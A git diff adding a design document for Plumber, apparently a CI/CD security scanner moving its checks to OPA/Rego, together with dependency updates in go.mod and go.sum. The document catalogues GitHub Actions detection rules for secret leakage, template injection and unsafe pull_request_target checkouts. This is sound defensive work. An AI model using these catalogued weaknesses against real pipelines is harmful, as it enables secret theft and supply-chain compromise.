+etc. to the same shape. The IR stays **lossy on purpose**: what doesn't fit
+goes into `Raw` and can be used by provider-specific policies.
+
+## 6. Policy layout β first sketch
+
+```text
+policies/
+βββ lib/
+β βββ image.rego # helpers: parse_image(), is_mutable_tag()
+β βββ job.rego # helpers: is_security_scanner(), is_weakened()
+βββ image/
+β βββ mutable_tag.rego
+β βββ untrusted_registry.rego
+β βββ pinned_by_digest.rego
+βββ pipeline/
+β βββ debug_trace.rego
+β βββ docker_in_docker.rego
+β βββ variable_injection.rego
+β βββ unverified_scripts.rego
+β βββ hardcoded_jobs.rego
+βββ security/
+β βββ weakened_scanners.rego
+βββ origin/
+ βββ outdated_includes.rego
+ βββ forbidden_versions.rego
+```
+
+Every policy emits findings in a uniform shape:
+
+```rego
+package plumber.image.mutable_tag
+
+import rego.v1
+
+deny contains finding if {
+ job := input.jobs[_]
+ job.image.tag in {"latest", "dev", "master", "main"}
+ finding := {
+ "code": "IMG-001",
+ "severity": "high",
+ "message": sprintf("job %q uses mutable tag %q", [job.name, job.image.tag]),
+ "job": job.name,
+ "file": job.origin_file,
+ }
+}
+```
+
+A Go-side schema validates and enriches findings (severity catalog,
+remediation URL, CWE referencesβ¦) before they flow into the existing
+reporter.
+
+## 7. Design decisions (validated 2026-04-23)
+
+
+| # | Decision | Chosen option |
+| -- | ---------------------------- | ------------- |
+| D1 | **IR scope** | **Minimal shared IR + `Raw` escape hatch per provider.** Extend as concrete rules demand it β not in advance. |
+| D2 | **Policy packaging** | **`//go:embed` built-in policies + optional user directory via `--policies`.** The binary is self-contained; users can extend or override without recompiling. |
+| D3 | **Initial provider targets** | **GitLab (adapt existing collector) + GitHub Actions (new collector).** Gitea, Azure DevOps, Bitbucket Pipelines, and Dagger are explicitly out of scope for v1 and will be considered after the first stable release. |
+| D4 | **Hybrid period** | **Rule-by-rule port.** Each Go control is replaced by its Rego equivalent behind a feature flag, parity is verified against integration fixtures, then the Go path is removed. No big-bang cutover. |
+| D5 | **Output compatibility** | **Deprecate-in-place.** A new `findings[]` field is added to `AnalysisResult`. Legacy per-control fields are kept for 1β2 minor versions with a deprecation warning in the JSON output, then removed in a documented minor release. |
+
+
+## 8. Migration plan
+
+### Phase 0 β preparation (no behavior change) β DONE
+
+- [x] Validate open decisions Β§7 with maintainers.
+- [x] Open a tracking issue (required by `AI_POLICY.md`). β [#148](https://github.com/getplumber/plumber/issues/148)
+- [x] Add `github.com/open-policy-agent/opa` to `go.mod`.
+- [x] Create `internal/ir/` and `internal/engine/opa/` skeletons.
+
+### Phase 1 β IR + engine alongside existing controls β DONE
+
+- [x] Define `NormalizedPipeline` and the minimal `Job`/`Image`/`Include` types.
+- [x] Write a GitLab IR mapper from the existing `collector` output (`collector.ToNormalizedPipeline`).
+- [x] Build the OPA engine: load embedded policies, evaluate, emit findings.
+- [x] Unit-test the engine with a fake IR + one dummy policy.
+- [x] Gate the engine behind `engine.enabled` (default off) with parity checks against `lab-gitlab-cicd` (branch `solution/lab-12`).
+
+### Phase 2 β port one rule end-to-end
+
+- [ ] Pick the simplest rule (proposal: `image/mutable_tag`).
+- [ ] Write the Rego policy + fixtures.
+- [ ] Wire a feature flag so the rule runs via Rego, not Go.
+- [ ] Verify JSON output is identical to the Go version on the integration fixtures.
+
+### Phase 3 β port remaining GitLab rules β DONE
+
+- [x] Incrementally migrate each of the ~15 controls.
+ ISSUE-{101,102,103,203,204,205,401,403,404,410,411,412,413,501,505}
+ plus required components/templates ISSUE-{405,406,408,409}.
+- [ ] Remove Go controls as each Rego equivalent reaches parity.
+- [x] Keep tests green at every step.
+
+### Phase 4 β GitHub Actions provider β DONE
+
+- [x] New collector (`collector/github_workflows.go`, local-only MVP β no GitHub API needed).
+- [x] GitHub β IR mapper (`ScanGitHubWorkflows` emits `ir.NormalizedPipeline`).
+- [x] Run existing `image_mutable_tag` policy against `../lab-github-cicd` GitHub fixture with zero changes to the Rego.
+- [x] CLI auto-dispatches on `github.com` remote; `runGitHubAnalyze` is Rego-only, no `GITLAB_TOKEN` required.
+- [ ] Provider-specific policies (Phase 5+: `excessive-permissions`, `dangerous-triggers`, `template-injection`, β¦ β see Β§11).
+
+### Phase 5 β documentation & DX
+
+- [ ] User docs for writing a custom policy.
+- [ ] `plumber policy test` command (wrapper around `opa test`).
+- [ ] Update `README`, `CONTRIBUTING`, website.
+
+## 9. Risks & mitigations
+
+
+| Risk | Mitigation |
+| ----------------------------------------------- | ---------- |
+| Rego can't fetch (API calls during evaluation) | Collector enriches the IR *before* OPA runs (e.g. pre-fetch latest include refs). |
+| Performance regression on large pipelines | Benchmark before/after in Phase 2; keep Go path behind feature flag until benchmarks pass. |
+| Breaking JSON output for existing users | Keep legacy fields, add new ones; document migration. |
+| Policy explosion / unmaintainable Rego | Shared `lib/` helpers; `opa test` coverage; lint in CI. |
+| Scope creep (Terraform, K8sβ¦) | Explicit non-goal Β§2. Reject in reviews. |
+
+
+## 10. AI contribution notes
+
+This refactor is expected to involve Claude Code (see `AI_POLICY.md`).
+All AI-assisted PRs **must**:
+
+- Reference the tracking issue for this refactor (to be opened in Phase 0).
+- Be fully reviewed and verified by a human before merge.
+- Disclose AI usage in the PR description.
+
+## 11. Catalog of GitHub Actions security checks
+
+The following rule catalog drives the Rego policies Plumber ships for
+GitHub Actions workflows. Each check has a stable identifier used as
+its Rego package name and Rego module file name (e.g. `excessive-permissions`
+β `policies/excessive_permissions.rego`). Fixture YAMLs live under
+`policies/testdata/ISSUE-XXX/github/`.
+
+Status legend: **done** β policy ported and tested; **planned** β to port.
+
+### Supply chain & action references
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `unpinned-uses` (ISSUE-104) | `uses: owner/action@v4` instead of hash-pinned references | **done** |
+| `cache-poisoning` (ISSUE-106) | Release/publish job restores a non-ref-scoped build cache | **done** |
+| `archived-uses` (ISSUE-108) | Actions hosted in an archived repository | **done** |
+| `impostor-commit` (ISSUE-109) | Commit SHA that does not belong to the declared upstream repo | **done** |
+| `ref-version-mismatch` (ISSUE-110) | Hash-pinned action with a misleading `# vX.Y.Z` comment | **done** |
+| `stale-action-refs` (ISSUE-111) | Action pin is behind the latest upstream release | **done** |
+| `ref-confusion` (ISSUE-113) | Symbolic refs that are ambiguous (branch vs tag collision) | **done** |
+| `known-vulnerable-actions` (ISSUE-114) | Action versions with published GHSA advisories | **done** |
+| `superfluous-actions` (ISSUE-115) | Third-party actions duplicating runner built-ins | **done** |
+
+
+### Container images
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `unpinned-images` (ISSUE-102) | Mutable container tags (`:latest`, `:dev`, glob patterns) | **done** |
+| `image-pinned-by-digest` (ISSUE-103) | Container images must be pinned by immutable digest (@sha256:…) | **done** |
+| `hardcoded-container-credentials` (ISSUE-105) | Registry password literals in `container.credentials` | **done** |
+
+
+### Triggers & inputs
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `dangerous-triggers` (ISSUE-414) | `pull_request_target`, `workflow_run` with unsafe code checkout | **done** |
+| `pull-request-target-with-head-checkout` (ISSUE-415) | Explicit PR-head checkout under `pull_request_target` (CVE-2025-30066 pattern) | **done** |
+| `template-injection` (ISSUE-206) | User input rendered into `run:` via `${{ github.event.* }}` | **done** |
+| `bot-conditions` (ISSUE-210) | Spoofable `github.actor == 'dependabot[bot]'` checks | **done** |
+| `unsound-condition` (ISSUE-211) | Logically unsound conditional expressions | **done** |
+| `unsound-contains` (ISSUE-212) | Misused `contains()` built-in | **done** |
+
+
+### Permissions & secrets
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `excessive-permissions` (ISSUE-509) | Blanket `permissions: write-all` | **done** |
+| `undocumented-permissions` (ISSUE-304) | Workflow runs with no explicit `permissions:` block | **done** |
+| `overprovisioned-secrets` (ISSUE-301) | Entire `secrets` context exported via `toJson(secrets)` | **done** |
+| `secrets-outside-env` (ISSUE-305) | Deploy/publish job uses secrets without `environment:` gate | **done** |
+| `unredacted-secrets` (ISSUE-303) | `fromJSON(secrets.X).y` bypasses automatic log redaction | **done** |
+| `secrets-inherit` (ISSUE-302) | Reusable workflow called with `secrets: inherit` | **done** |
+| `github-app` (ISSUE-306) | GitHub App token issued with `skip-token-revoke: true` | **done** |
+| `github-env` (ISSUE-209) | Untrusted writes to `GITHUB_ENV` / `GITHUB_PATH` | **done** |
+| `artipacked` (ISSUE-307) | `actions/checkout` without `persist-credentials: false` | **done** |
+
+
+### Workflow hygiene
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `anonymous-definition` (ISSUE-601) | Workflow or action without a `name:` field | **done** |
+| `concurrency-limits` (ISSUE-602) | Missing `concurrency` block with `cancel-in-progress` | **done** |
+| `insecure-commands` (ISSUE-208) | `ACTIONS_ALLOW_UNSECURE_COMMANDS: true` | **done** |
+| `cache-poisoning` (ISSUE-106) | `actions/cache` used inside a release workflow | **done** |
+| `use-trusted-publishing` (ISSUE-605) | PyPI/npm publish via static token instead of OIDC | **done** |
+| `misfeature` (ISSUE-603) | Upload-artifact of the checkout directory (leaks `.git/`) | **done** |
+| `obfuscation` (ISSUE-604) | Zero-width / bidirectional Unicode in scripts and inputs | **done** |
+
+
+### Dependabot
+
+
+| Check | Detects | Status |
+| ----------------------------------- | ------------------------------------------------------------------ | -------- |
+| `dependabot-execution` (ISSUE-606) | `insecure-external-code-execution: allow` | **done** |
+| `dependabot-cooldown` (ISSUE-607) | Missing `cooldown:` window in `.github/dependabot.yml` | **done** |
+
+
+### Repository-hygiene checks
+
+Rules that extend the audit surface from the workflow YAML to the
+surrounding repository artefacts — Dockerfiles, SECURITY.md,
+dependency-update configs, release-signing steps — and to
+injection patterns not covered by the original template-injection
+family.
+
+
+| Check | Detects | Status |
+| --------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | -------- |
+| `unsafe-github-context-dump` (ISSUE-213) | `toJson(github)` / `toJson(github.event)` piped into a script / env / input | **done** |
+| `unpinned-package-install` (ISSUE-214) | `pip install X` / `npm install X` without version pin or lockfile | **done** |
+| `release-workflow-unsigned` (ISSUE-112) | Release / publish job produces artefacts without any signing step (cosign, sigstore, GPG) | **done** |
+| `dockerfile-unpinned-base` (ISSUE-107) | `FROM image:tag` in a repo Dockerfile without `@sha256:` digest | **done** |
+| `dependency-update-tool-missing` (ISSUE-608) | Repository ships workflows but neither Dependabot nor Renovate is configured | **done** |
+| `sast-workflow-missing` (ISSUE-609) | No workflow runs a recognised SAST scanner (CodeQL, Semgrep, SonarQube, Trivy, Snyk, …) | **done** |
+| `security-policy-missing` (ISSUE-610) | Repository ships workflows but no SECURITY.md disclosure policy | **done** |
+
+
+A matching fixture project lives in `../lab-github-cicd/` (outside the
+Plumber repository) so every planned check has a real workflow to run
+against during development.
diff --git a/docs/scoring.md b/docs/scoring.md
index a203650..7ed8dc1 100644
--- a/docs/scoring.md
+++ b/docs/scoring.md
@@ -68,7 +68,6 @@ L_uncapped = w Γ (1 + 0.5 Γ log2(n))
**Why caps?** So one severity bucket cannot erase the entire scale on its own. Critical stays uncapped on purpose so stacking Critical issues keeps hurting, though the malus in Step 3 already forces the letter into the **E** band.
-
---
## Step 2: Raw points
diff --git a/go.mod b/go.mod
index 2d55730..e6b6ff1 100644
--- a/go.mod
+++ b/go.mod
@@ -5,34 +5,75 @@ go 1.25.0
require (
github.com/AlecAivazis/survey/v2 v2.3.7
github.com/IGLOU-EU/go-wildcard/v2 v2.1.0
+ github.com/charmbracelet/lipgloss v1.1.1-0.20250319133953-166f707985bc
+ github.com/cli/go-gh/v2 v2.13.0
github.com/google/uuid v1.6.0
- github.com/hashicorp/go-version v1.9.0
+ github.com/hashicorp/go-version v1.8.0
github.com/machinebox/graphql v0.2.2
+ github.com/open-policy-agent/opa v1.15.2
+ github.com/schollz/progressbar/v3 v3.19.0
github.com/sirupsen/logrus v1.9.4
- github.com/spf13/cobra v1.8.1
- gitlab.com/gitlab-org/api/client-go v1.46.0
- golang.org/x/term v0.42.0
+ github.com/spf13/cobra v1.10.2
+ gitlab.com/gitlab-org/api/client-go v1.13.0
+ golang.org/x/term v0.40.0
gopkg.in/yaml.v2 v2.4.0
)
require (
- github.com/google/go-cmp v0.7.0 // indirect
+ github.com/agnivade/levenshtein v1.2.1 // indirect
+ github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
+ github.com/cespare/xxhash/v2 v2.3.0 // indirect
+ github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc // indirect
+ github.com/charmbracelet/x/ansi v0.8.0 // indirect
+ github.com/charmbracelet/x/cellbuf v0.0.13 // indirect
+ github.com/charmbracelet/x/term v0.2.1 // indirect
+ github.com/cli/safeexec v1.0.0 // indirect
+ github.com/cli/shurcooL-graphql v0.0.4 // indirect
+ github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0 // indirect
+ github.com/gobwas/glob v0.2.3 // indirect
+ github.com/goccy/go-json v0.10.5 // indirect
github.com/google/go-querystring v1.2.0 // indirect
github.com/hashicorp/go-cleanhttp v0.5.2 // indirect
github.com/hashicorp/go-retryablehttp v0.7.8 // indirect
+ github.com/henvic/httpretty v0.0.6 // indirect
github.com/inconshreveable/mousetrap v1.1.0 // indirect
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect
- github.com/kr/pretty v0.3.1 // indirect
+ github.com/lestrrat-go/blackmagic v1.0.4 // indirect
+ github.com/lestrrat-go/dsig v1.0.0 // indirect
+ github.com/lestrrat-go/dsig-secp256k1 v1.0.0 // indirect
+ github.com/lestrrat-go/httpcc v1.0.1 // indirect
+ github.com/lestrrat-go/httprc/v3 v3.0.2 // indirect
+ github.com/lestrrat-go/jwx/v3 v3.0.13 // indirect
+ github.com/lestrrat-go/option/v2 v2.0.0 // indirect
+ github.com/lucasb-eyer/go-colorful v1.2.0 // indirect
github.com/matryer/is v1.4.1 // indirect
github.com/mattn/go-colorable v0.1.13 // indirect
github.com/mattn/go-isatty v0.0.20 // indirect
- github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b // indirect
+ github.com/mattn/go-runewidth v0.0.16 // indirect
+ github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d // indirect
+ github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db // indirect
+ github.com/muesli/termenv v0.16.0 // indirect
github.com/pkg/errors v0.9.1 // indirect
- github.com/rogpeppe/go-internal v1.14.1 // indirect
- github.com/spf13/pflag v1.0.5 // indirect
+ github.com/rcrowley/go-metrics v0.0.0-20250401214520-65e299d6c5c9 // indirect
+ github.com/rivo/uniseg v0.4.7 // indirect
+ github.com/segmentio/asm v1.2.1 // indirect
+ github.com/spf13/pflag v1.0.10 // indirect
+ github.com/tchap/go-patricia/v2 v2.3.3 // indirect
+ github.com/thlib/go-timezone-local v0.0.0-20210907160436-ef149e42d28e // indirect
+ github.com/valyala/fastjson v1.6.7 // indirect
+ github.com/vektah/gqlparser/v2 v2.5.32 // indirect
+ github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb // indirect
+ github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect
+ github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect
+ github.com/yashtewari/glob-intersection v0.2.0 // indirect
+ go.yaml.in/yaml/v2 v2.4.2 // indirect
+ go.yaml.in/yaml/v3 v3.0.4 // indirect
+ golang.org/x/crypto v0.48.0 // indirect
golang.org/x/oauth2 v0.34.0 // indirect
- golang.org/x/sys v0.43.0 // indirect
- golang.org/x/text v0.32.0 // indirect
- golang.org/x/time v0.14.0 // indirect
- gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c // indirect
+ golang.org/x/sync v0.20.0 // indirect
+ golang.org/x/sys v0.41.0 // indirect
+ golang.org/x/text v0.34.0 // indirect
+ golang.org/x/time v0.15.0 // indirect
+ gopkg.in/yaml.v3 v3.0.1 // indirect
+ sigs.k8s.io/yaml v1.6.0 // indirect
)
diff --git a/go.sum b/go.sum
index ee1ea03..99ddc06 100644
--- a/go.sum
+++ b/go.sum
@@ -4,15 +4,75 @@ github.com/IGLOU-EU/go-wildcard/v2 v2.1.0 h1:WFqyYAuIYLJ6mHZ4rp/bYXiR4E1IvXW4+zI
github.com/IGLOU-EU/go-wildcard/v2 v2.1.0/go.mod h1:/sUMQ5dk2owR0ZcjRI/4AZ+bUFF5DxGCQrDMNBXUf5o=
github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2 h1:+vx7roKuyA63nhn5WAunQHLTznkw5W8b1Xc0dNjp83s=
github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2/go.mod h1:HBCaDeC1lPdgDeDbhX8XFpy1jqjK0IBG8W5K+xYqA0w=
-github.com/cpuguy83/go-md2man/v2 v2.0.4/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o=
-github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E=
+github.com/agnivade/levenshtein v1.2.1 h1:EHBY3UOn1gwdy/VbFwgo4cxecRznFk7fKWN1KOX7eoM=
+github.com/agnivade/levenshtein v1.2.1/go.mod h1:QVVI16kDrtSuwcpd0p1+xMC6Z/VfhtCyDIjcwga4/DU=
+github.com/andreyvit/diff v0.0.0-20170406064948-c7f18ee00883 h1:bvNMNQO63//z+xNgfBlViaCIJKLlCJ6/fmUseuG0wVQ=
+github.com/andreyvit/diff v0.0.0-20170406064948-c7f18ee00883/go.mod h1:rCTlJbsFo29Kk6CurOXKm700vrz8f0KW0JNfpkRJY/8=
+github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0 h1:jfIu9sQUG6Ig+0+Ap1h4unLjW6YQJpKZVmUzxsD4E/Q=
+github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0/go.mod h1:t2tdKJDJF9BV14lnkjHmOQgcvEKgtqs5a1N3LNdJhGE=
+github.com/aymanbagabas/go-osc52/v2 v2.0.1 h1:HwpRHbFMcZLEVr42D4p7XBqjyuxQH5SMiErDT4WkJ2k=
+github.com/aymanbagabas/go-osc52/v2 v2.0.1/go.mod h1:uYgXzlJ7ZpABp8OJ+exZzJJhRNQ2ASbcXHWsFqH8hp8=
+github.com/aymanbagabas/go-udiff v0.2.0 h1:TK0fH4MteXUDspT88n8CKzvK0X9O2xu9yQjWpi6yML8=
+github.com/aymanbagabas/go-udiff v0.2.0/go.mod h1:RE4Ex0qsGkTAJoQdQQCA0uG+nAzJO/pI/QwceO5fgrA=
+github.com/beorn7/perks v1.0.1 h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM=
+github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
+github.com/bytecodealliance/wasmtime-go/v39 v39.0.1 h1:RibaT47yiyCRxMOj/l2cvL8cWiWBSqDXHyqsa9sGcCE=
+github.com/bytecodealliance/wasmtime-go/v39 v39.0.1/go.mod h1:miR4NYIEBXeDNamZIzpskhJ0z/p8al+lwMWylQ/ZJb4=
+github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs=
+github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
+github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc h1:4pZI35227imm7yK2bGPcfpFEmuY1gc2YSTShr4iJBfs=
+github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc/go.mod h1:X4/0JoqgTIPSFcRA/P6INZzIuyqdFY5rm8tb41s9okk=
+github.com/charmbracelet/lipgloss v1.1.1-0.20250319133953-166f707985bc h1:nFRtCfZu/zkltd2lsLUPlVNv3ej/Atod9hcdbRZtlys=
+github.com/charmbracelet/lipgloss v1.1.1-0.20250319133953-166f707985bc/go.mod h1:aKC/t2arECF6rNOnaKaVU6y4t4ZeHQzqfxedE/VkVhA=
+github.com/charmbracelet/x/ansi v0.8.0 h1:9GTq3xq9caJW8ZrBTe0LIe2fvfLR/bYXKTx2llXn7xE=
+github.com/charmbracelet/x/ansi v0.8.0/go.mod h1:wdYl/ONOLHLIVmQaxbIYEC/cRKOQyjTkowiI4blgS9Q=
+github.com/charmbracelet/x/cellbuf v0.0.13 h1:/KBBKHuVRbq1lYx5BzEHBAFBP8VcQzJejZ/IA3iR28k=
+github.com/charmbracelet/x/cellbuf v0.0.13/go.mod h1:xe0nKWGd3eJgtqZRaN9RjMtK7xUYchjzPr7q6kcvCCs=
+github.com/charmbracelet/x/exp/golden v0.0.0-20240806155701-69247e0abc2a h1:G99klV19u0QnhiizODirwVksQB91TJKV/UaTnACcG30=
+github.com/charmbracelet/x/exp/golden v0.0.0-20240806155701-69247e0abc2a/go.mod h1:wDlXFlCrmJ8J+swcL/MnGUuYnqgQdW9rhSD61oNMb6U=
+github.com/charmbracelet/x/term v0.2.1 h1:AQeHeLZ1OqSXhrAWpYUtZyX1T3zVxfpZuEQMIQaGIAQ=
+github.com/charmbracelet/x/term v0.2.1/go.mod h1:oQ4enTYFV7QN4m0i9mzHrViD7TQKvNEEkHUMCmsxdUg=
+github.com/chengxilo/virtualterm v1.0.4 h1:Z6IpERbRVlfB8WkOmtbHiDbBANU7cimRIof7mk9/PwM=
+github.com/chengxilo/virtualterm v1.0.4/go.mod h1:DyxxBZz/x1iqJjFxTFcr6/x+jSpqN0iwWCOK1q10rlY=
+github.com/cli/go-gh/v2 v2.13.0 h1:jEHZu/VPVoIJkciK3pzZd3rbT8J90swsK5Ui4ewH1ys=
+github.com/cli/go-gh/v2 v2.13.0/go.mod h1:Us/NbQ8VNM0fdaILgoXSz6PKkV5PWaEzkJdc9vR2geM=
+github.com/cli/safeexec v1.0.0 h1:0VngyaIyqACHdcMNWfo6+KdUYnqEr2Sg+bSP1pdF+dI=
+github.com/cli/safeexec v1.0.0/go.mod h1:Z/D4tTN8Vs5gXYHDCbaM1S/anmEDnJb1iW0+EJ5zx3Q=
+github.com/cli/shurcooL-graphql v0.0.4 h1:6MogPnQJLjKkaXPyGqPRXOI2qCsQdqNfUY1QSJu2GuY=
+github.com/cli/shurcooL-graphql v0.0.4/go.mod h1:3waN4u02FiZivIV+p1y4d0Jo1jc6BViMA73C+sZo2fk=
+github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g=
github.com/creack/pty v1.1.17 h1:QeVUsEDNrLBW4tMgZHvxy18sKtr6VI492kBhUfhDJNI=
github.com/creack/pty v1.1.17/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc h1:U9qPSI2PIWSS1VwoXQT9A3Wy9MM3WgvqSxFWenqJduM=
+github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0 h1:NMZiJj8QnKe1LgsbDayM4UoHwbvwDRwnI3hwNaAHRnc=
+github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0/go.mod h1:ZXNYxsqcloTdSy/rNShjYzMhyjf0LaoftYK0p+A3h40=
+github.com/dgraph-io/badger/v4 v4.9.1 h1:DocZXZkg5JJHJPtUErA0ibyHxOVUDVoXLSCV6t8NC8w=
+github.com/dgraph-io/badger/v4 v4.9.1/go.mod h1:5/MEx97uzdPUHR4KtkNt8asfI2T4JiEiQlV7kWUo8c0=
+github.com/dgraph-io/ristretto/v2 v2.2.0 h1:bkY3XzJcXoMuELV8F+vS8kzNgicwQFAaGINAEJdWGOM=
+github.com/dgraph-io/ristretto/v2 v2.2.0/go.mod h1:RZrm63UmcBAaYWC1DotLYBmTvgkrs0+XhBd7Npn7/zI=
+github.com/dgryski/trifles v0.0.0-20230903005119-f50d829f2e54 h1:SG7nF6SRlWhcT7cNTs5R6Hk4V2lcmLz2NsG2VnInyNo=
+github.com/dgryski/trifles v0.0.0-20230903005119-f50d829f2e54/go.mod h1:if7Fbed8SFyPtHLHbg49SI7NAdJiC5WIA09pe59rfAA=
+github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY=
+github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto=
github.com/fatih/color v1.16.0 h1:zmkK9Ngbjj+K0yRhTVONQh1p/HknKYSlNT+vZCzyokM=
github.com/fatih/color v1.16.0/go.mod h1:fL2Sau1YI5c0pdGEVCbKQbLXB6edEj1ZgiY4NijnWvE=
+github.com/fortytw2/leaktest v1.3.0 h1:u8491cBMTQ8ft8aeV+adlcytMZylmA5nnwwkRZjI8vw=
+github.com/fortytw2/leaktest v1.3.0/go.mod h1:jDsjWgpAGjm2CA7WthBh/CdZYEPF31XHquHwclZch5g=
+github.com/foxcpp/go-mockdns v1.2.0 h1:omK3OrHRD1IWJz1FuFBCFquhXslXoF17OvBS6JPzZF0=
+github.com/foxcpp/go-mockdns v1.2.0/go.mod h1:IhLeSFGed3mJIAXPH2aiRQB+kqz7oqu8ld2qVbOu7Wk=
+github.com/go-logr/logr v1.4.3 h1:CjnDlHq8ikf6E492q6eKboGOC0T8CDaOvkHCIg8idEI=
+github.com/go-logr/logr v1.4.3/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY=
+github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag=
+github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE=
+github.com/gobwas/glob v0.2.3 h1:A4xDbljILXROh+kObIiy5kIaPYD8e96x1tgBhUI5J+Y=
+github.com/gobwas/glob v0.2.3/go.mod h1:d3Ez4x06l9bZtSvzIay5+Yzi0fmZzPgnTbPcKjJAkT8=
+github.com/goccy/go-json v0.10.5 h1:Fq85nIqj+gXn/S5ahsiTlK3TmC85qgirsdTP/+DeaC4=
+github.com/goccy/go-json v0.10.5/go.mod h1:oq7eo15ShAhp70Anwd5lgX2pLfOS3QCiwU/PULtXL6M=
+github.com/google/flatbuffers v25.2.10+incompatible h1:F3vclr7C3HpB1k9mxCGRMXq6FdUalZ6H/pNX4FP1v0Q=
+github.com/google/flatbuffers v25.2.10+incompatible/go.mod h1:1AeVuKshWv4vARoZatz6mlQ0JxURH0Kv5+zNeJKJCa8=
github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
@@ -20,29 +80,46 @@ github.com/google/go-querystring v1.2.0 h1:yhqkPbu2/OH+V9BfpCVPZkNmUXhb2gBxJArfh
github.com/google/go-querystring v1.2.0/go.mod h1:8IFJqpSRITyJ8QhQ13bmbeMBDfmeEJZD5A0egEOmkqU=
github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
-github.com/graph-gophers/graphql-go v1.9.0 h1:yu0ucKHLc5qGpRwLYKIWtr9bOoxovkWasuBrPQwlHls=
-github.com/graph-gophers/graphql-go v1.9.0/go.mod h1:23olKZ7duEvHlF/2ELEoSZaY1aNPfShjP782SOoNTyM=
+github.com/h2non/parth v0.0.0-20190131123155-b4df798d6542 h1:2VTzZjLZBgl62/EtslCrtky5vbi9dd7HrQPQIx6wqiw=
+github.com/h2non/parth v0.0.0-20190131123155-b4df798d6542/go.mod h1:Ow0tF8D4Kplbc8s8sSb3V2oUCygFHVp8gC3Dn6U4MNI=
github.com/hashicorp/go-cleanhttp v0.5.2 h1:035FKYIWjmULyFRBKPs8TBQoi0x6d9G4xc9neXJWAZQ=
github.com/hashicorp/go-cleanhttp v0.5.2/go.mod h1:kO/YDlP8L1346E6Sodw+PrpBSV4/SoxCXGY6BqNFT48=
github.com/hashicorp/go-hclog v1.6.3 h1:Qr2kF+eVWjTiYmU7Y31tYlP1h0q/X3Nl3tPGdaB11/k=
github.com/hashicorp/go-hclog v1.6.3/go.mod h1:W4Qnvbt70Wk/zYJryRzDRU/4r0kIg0PVHBcfoyhpF5M=
